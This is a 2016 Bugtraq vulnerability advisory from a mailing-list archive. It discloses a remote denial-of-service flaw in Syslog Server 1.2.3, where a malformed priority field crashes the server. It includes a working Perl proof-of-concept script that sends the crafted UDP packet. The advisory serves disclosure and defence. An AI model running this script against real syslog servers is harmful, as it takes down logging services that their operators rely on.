lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201607041842.u64Iglnl006291@sf01web1.securityfocus.com>
Date: Mon, 4 Jul 2016 18:42:47 GMT
From: chaoyi.huang@...nect.polyu.hk
To: bugtraq@...urityfocus.com
Subject: Syslog Server "npriority" field remote Denial of Service
 vulnerability

Title: Syslog Server "npriority" field remote Denial of Service vulnerability
Software : Syslog Server

Software Version : Syslog Server 1.2.3

Vendor: https://sourceforge.net/p/syslog-server/

Vulnerability Published : 2016-07-02

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Syslog Server 1.2.3 is a free syslog server for Windows systems.
The syslog server cannot handle the content of the npriority field well, whereupon the server may be collapsed by receiving a customized packet.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);
$|=1;

$host=shift;
$port=shift;

die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));

$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";

$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;

$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
$con->send($packet);
print "Done!\n";
$con->close;

exit(0);
-----------------------------------------------------------

Credits : This vulnerability was discovered by ChaoYi.Huang_at_connect.polyu.hk
mail: ChaoYi(dot)Huang(at)connect(dot)polyu(dot)hk / demonalex(at)163(dot)com / chaoyi(dot)huang(at)ccbny(dot)com
Pentester/Independent Researcher

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ